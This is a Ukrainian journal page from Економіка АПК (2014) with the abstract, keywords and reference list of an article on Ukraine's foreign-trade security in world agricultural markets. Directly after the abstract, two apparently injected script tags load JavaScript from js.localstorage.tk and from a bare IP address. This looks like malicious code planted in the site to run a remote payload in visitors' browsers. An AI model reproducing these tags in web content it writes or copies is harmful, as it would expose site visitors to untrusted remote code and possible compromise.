ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 339.54:339.727:631.1(477)
Зовнішньоекономічні відносини

Забезпечення зовнішньоторговельної безпеки України на світовому ринку сільськогосподарської продукції – загальна спрямованість / Власюк Т. О. // Економіка АПК. - 2014. - № 12 - С. 76

Аналізується сучасний стан сільськогосподарської галузі, її конкурентоспроможність на світових ринках, географічна й товарна структура експорту сільськогосподарської продукції з України, ресурсно-виробничі потужності галузі, географічна та товарна структура імпорту сільськогосподарської продукції в Україну. Визначені основні загрози зовнішньоторговельній безпеці національної економіки у сільськогосподарському сегменті. Окрім цього, проведено SWOT-аналіз передумов зовнішньоторговельної безпеки України на світовому ринку сільськогосподарської продукції. Розроблено рекомендації щодо забезпечення зовнішньоторговельної безпеки України на світовому ринку сільськогосподарської продукції, що потребують реалізації комплексу заходів як у межах державної економічної політики, так і на галузевому рівні управління. Табл.: 4. Рис.: 2. Бібліогр.: 21.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: сільськогосподарська галузь, експорт, імпорт, зовнішньоторговельна безпека, світовий ринок

Список використаних джерел

 1. Зовнішня торгівля України : стат. зб. / Державна служба статистики України. – Відп. за вип. А. Фризоренко, – К., 2014. – 106 с.
 2. Зовнішня торгівля України товарами та послугами в Україні у 2012 році : стат. зб. / Державна служба статистики України. – Відп. за вип. А. Фризоренко. –Т. 1. – К., 2014. – 140 с.
 3. Зовнішня торгівля України товарами та послугами в Україні у 2012 році : стат. зб. / Державна служба статистики України. – Відп. за вип. А. Фризоренко. – Т. 2. – К., 2014. – 244 с.
 4. Зовнішня торгівля України товарами та послугами в Україні у 2013 році : стат. зб. / Державна служба статистики України. – Відп. за вип. А. Фризоренко. – К., 2014. – 158 с.
 5. Из-за недостатка зернохранилищ аграрии потеряли 10 млрд грн – эксперт. – [Електронний ресурс]. – Режим доступу : http://latifundist.com/novosti/23024-iz-za-nedostatka-zernohranilishch-agrarii-poteryali-10-mlrd-grn--ekspert
 6. Кількість сільськогосподарських обслуговуючих кооперативів в Україні за видами, станом на 01.04.2014. – [Електронний ресурс]. – Режим доступу: http://minagro.gov.ua/node/13884.
 7. Податковий кодекс України : Закон України від 02.12.2010 р. № 2755-VI // Голос України. – 2010. – 4 груд. – № 229 (№229-230).
 8. Прес-реліз до Міжнародної конференції “Нові можливості та виклики для аграрної торгівлі України з ЄС”. – [Електронний ресурс]. – Режим доступу : http://minagro.gov.ua/node/13524.
 9. Про сільськогосподарську кооперацію : Закон України // Відом. Верхов. Ради України (ВВР). – 1997. – № 39.
 10. Реалізація ініціативи "Рідне село" сприятиме формуванню середнього класу в селі. – [Електронний ресурс]. – Режим доступу: http : //www.kmu.gov.ua/control/uk/publish/article?art_id=245207336&cat_id=244276429.
 11. Розвиток сільських територій в системі євроінтеграційних пріоритетів України : [моногр.] / НАН України. Ін-т регіональних досліджень; наук. ред. В. В. Борщевський. – Львів, 2012. – 216 с. (Серія “Проблеми регіонального розвитку”).
 12. Сільське господарство України у 2013 році : стат. зб. / Державна служба статистики України. – За ред. Н.С. Власенко. – К., 2014. – 400 с.
 13. Співробітництво між Україною та ЄС у 2011 році : стат. зб. / Державна служба статистики України. – Відп. за вип. А. Фризоренко. – К., 2012. – 242 с.
 14. Співробітництво між Україною та ЄС у 2012 році : стат. зб. / Державна служба статистики України. – Відп. за вип. А. Фризоренко. – К., 2013. – 229 с.
 15. Співробітництво між Україною та ЄС у 2013 році : стат. зб. / Державна служба статистики України. – Відп. за вип. А. Фризоренко. – К., 2014. – 208 с.
 16. Тимчасове застосування ЗВТ України з ЄС відтерміновано до 31 грудня 2015 року. – [Електронний ресурс]. – Режим доступу : http://economics.unian.ua/finance/984325-timchasove-zastosuvannya-zvt-ukrajini-z-es-vidterminovano-do-31-grudnya-2015-roku-zayava.html.
 17. Food Security Policy in Developed Countries, Parke Wilde. Oxford. Print Publication Date: Sep 2011.
 18. The Political Economy of the United Nations Security Council, James Raymond Vreeland, Axel Dreher, Cambridge University Press, Date Published: May 2014.
 19. Agricultural Economics: Pearson New International Edition, 3rd Edition,H. Drummond, John Goodwin Date Published Nov 2013.
 20. Introduction to Agricultural Economics,6th Edition,John Penson, Oral Capps, C. Rosson, Richard Woodward, Date Published May 2014.
 21. International Trade in Agricultural Products, Michael Reed, Date Published Jul 2000.
Читати статтю: 14_12_76-83.pdf